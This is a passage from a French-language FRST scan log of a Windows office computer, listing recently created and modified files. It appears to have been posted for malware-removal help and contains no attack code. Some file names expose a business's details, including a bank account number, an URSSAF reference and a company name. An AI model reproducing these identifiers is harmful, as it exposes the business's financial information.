2022-05-18 16:37 - 2022-05-18 16:37 - 000009170 _____ C:\Users\BUREAU DU MAS\Downloads\dpae (10).pdf
2022-05-17 07:51 - 2022-05-17 07:51 - 000050424 _____ C:\Users\BUREAU DU MAS\Downloads\document.pdf
2022-05-17 07:51 - 2022-05-17 07:51 - 000017766 _____ C:\Users\BUREAU DU MAS\Downloads\document (1).pdf
2022-05-16 12:58 - 2022-05-16 12:58 - 000336592 _____ C:\Users\BUREAU DU MAS\Downloads\correspondance (2).pdf
2022-05-16 12:57 - 2022-05-16 12:57 - 000267668 _____ C:\Users\BUREAU DU MAS\Downloads\URSSAF-Autorisation-Prelevement-2881045234322 (1).pdf
2022-05-16 12:57 - 2022-05-16 12:57 - 000207331 _____ C:\Users\BUREAU DU MAS\Downloads\URSSAF-Autorisation-Prelevement-2881045234322.pdf
2022-05-16 12:54 - 2022-05-16 12:54 - 000120520 _____ C:\Users\BUREAU DU MAS\Downloads\correspondance (1).pdf
2022-05-16 12:53 - 2022-05-16 12:53 - 000336592 _____ C:\Users\BUREAU DU MAS\Downloads\correspondance.pdf
2022-05-14 16:07 - 2022-05-14 16:07 - 000014495 _____ C:\Users\BUREAU DU MAS\Downloads\Avis d_effets domiciliés Compte 19157 000203258 01 C_C Contrat Pro Global SARL SGH DU SUD__Date d_imputation _ 04_05_2022 au 2022-04-27.pdf
2022-05-13 16:01 - 2022-05-13 16:01 - 000060637 _____ C:\Users\BUREAU DU MAS\Downloads\vosTimbres.pdf
2022-05-13 15:59 - 2022-05-13 15:59 - 000065153 _____ C:\Users\BUREAU DU MAS\Downloads\etiquettes.pdf
2022-05-13 09:46 - 2022-05-13 09:46 - 000064084 _____ C:\Users\BUREAU DU MAS\Desktop\Registre-du-personnel-Modèle-Excel-gratuit.xlsx
2022-05-13 09:43 - 2022-05-13 09:43 - 000058663 _____ C:\Users\BUREAU DU MAS\Downloads\Registre-du-personnel-Modèle-Excel-gratuit.xlsx
2022-05-13 07:09 - 2022-05-13 07:09 - 000288768 _____ C:\WINDOWS\system32\Windows.Management.InprocObjects.dll
2022-05-13 07:09 - 2022-05-13 07:09 - 000188928 _____ C:\WINDOWS\system32\uwfcfgmgmt.dll
2022-05-13 07:09 - 2022-05-13 07:09 - 000093696 _____ C:\WINDOWS\system32\Drivers\cimfs.sys
2022-05-13 07:09 - 2022-05-13 07:09 - 000011799 _____ C:\WINDOWS\system32\DrtmAuthTxt.wim
2022-05-13 06:59 - 2022-05-13 06:59 - 000000000 ___HD C:\$WinREAgent
2022-05-12 16:36 - 2022-05-12 16:36 - 000003842 _____ C:\WINDOWS\system32\Tasks\CCleanData
2022-05-11 15:39 - 2022-05-11 15:39 - 000178642 _____ C:\Users\BUREAU DU MAS\Downloads\995P0FAC2205000070_293230278.pdf
2022-05-10 17:08 - 2022-05-10 17:08 - 000003418 _____ C:\WINDOWS\system32\Tasks\Unlimited
2022-05-10 17:08 - 2022-05-10 17:08 - 000000000 ____D C:\ProgramData\Unlimited
2022-05-10 08:46 - 2022-05-10 08:46 - 000009153 _____ C:\Users\BUREAU DU MAS\Downloads\dpae (9).pdf
2022-05-09 14:26 - 2022-05-09 14:28 - 000000000 ____D C:\Users\BUREAU DU MAS\Desktop\socotec

==================== Un mois (modifiés) ==================

(Si un élément est inclus dans le fichier fixlist.txt, le fichier/dossier sera déplacé.)

2022-06-05 18:07 - 2019-10-11 18:54 - 000000000 ____D C:\Program Files (x86)\Google
2022-06-05 18:00 - 2019-10-14 11:47 - 000000000 ____D C:\Users\BUREAU DU MAS\Documents\Fichiers Outlook
2022-06-05 17:51 - 2020-08-31 19:40 - 000000000 ____D C:\WINDOWS\system32\Tasks\McAfee
2022-06-05 16:10 - 2019-12-07 11:14 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2022-06-05 15:44 - 2020-08-31 19:34 - 001771354 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2022-06-05 15:44 - 2019-12-07 16:50 - 000791866 _____ C:\WINDOWS\system32\perfh00C.dat
2022-06-05 15:44 - 2019-12-07 16:50 - 000150032 _____ C:\WINDOWS\system32\perfc00C.dat
2022-06-05 15:44 - 2019-12-07 11:13 - 000000000 ____D C:\WINDOWS\INF
2022-06-05 15:40 - 2020-08-31 19:40 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2022-06-05 15:40 - 2020-08-31 19:30 - 000008192 ___SH C:\DumpStack.log.tmp
2022-06-05 15:40 - 2020-08-31 19:30 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2022-06-05 15:40 - 2020-01-20 16:52 - 000000000 ____D C:\Program Files (x86)\TeamViewer
2022-06-05 15:40 - 2019-10-11 17:40 - 000000000 ____D C:\ProgramData\NVIDIA
2022-06-05 09:35 - 2019-12-07 11:14 - 000000000 ___HD C:\Program Files\WindowsApps
2022-06-05 09:35 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\AppReadiness
2022-06-05 08:38 - 2020-06-24 07:11 - 000002442 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2022-06-05 08:34 - 2020-08-31 19:31 - 000000000 ____D C:\Users\BUREAU DU MAS
2022-06-04 15:22 - 2019-10-31 13:06 - 000000000 ____D C:\Users\BUREAU DU MAS\Documents\PERSONNEL
2022-06-04 14:00 - 2019-12-07 11:03 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2022-06-03 07:20 - 2019-10-14 11:12 - 000000000 ____D C:\ProgramData\Packages
2022-05-31 15:28 - 2021-12-11 12:07 - 000003592 _____ C:\WINDOWS\system32\Tasks\OneDrive Reporting Task-S-1-5-21-3818313502-2494511162-3174529094-1001
2022-05-31 15:28 - 2020-08-31 19:40 - 000003396 _____ C:\WINDOWS\system32\Tasks\OneDrive Standalone Update Task-S-1-5-21-3818313502-2494511162-3174529094-1001
2022-05-31 15:28 - 2020-08-31 19:31 - 000002445 _____ C:\Users\BUREAU DU MAS\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2022-05-30 16:47 - 2019-12-07 11:03 - 000032768 _____ C:\WINDOWS\system32\config\ELAM
2022-05-17 09:20 - 2019-11-29 13:38 - 000000000 ____D C:\Users\BUREAU DU MAS\Documents\Documents réception
2022-05-14 09:16 - 2020-08-31 19:30 - 000368216 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2022-05-14 09:15 - 2019-12-07 16:53 - 000000000 ____D C:\Program Files\Windows Defender Advanced Threat Protection
2022-05-14 09:15 - 2019-12-07 11:14 - 000000000 ___SD C:\WINDOWS\system32\UNP
2022-05-14 09:15 - 2019-12-07 11:14 - 000000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2022-05-14 09:15 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\SystemResources
2022-05-14 09:15 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\system32\migwiz
2022-05-14 09:15 - 2019-12-07 11:14 - 000000000 ____D C:\WINDOWS\bcastdvr
2022-05-14 09:15 - 2019-12-07 11:14 - 000000000 ____D C:\Program Files\Common Files\System
2022-05-13 07:13 - 2019-12-07 11:03 - 000000000 ____D C:\WINDOWS\CbsTemp
2022-05-13 06:57 - 2019-10-11 18:46 - 000000000 ____D C:\WINDOWS\system32\MRT
2022-05-13 06:54 - 2019-10-11 18:46 - 145501456 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2022-05-10 08:04 - 2020-08-31 19:40 - 000003690 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2022-05-10 08:04 - 2020-08-31 19:40 - 000003566 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2022-05-10 07:16 - 2019-10-14 12:16 - 000000000 ____D C:\Program Files (x86)\McAfee

==================== SigCheck ============================

(Il n'y a pas de correction automatique pour les fichiers qui ne satisfont pas à la vérification.)

==================== Fin de FRST.txt ========================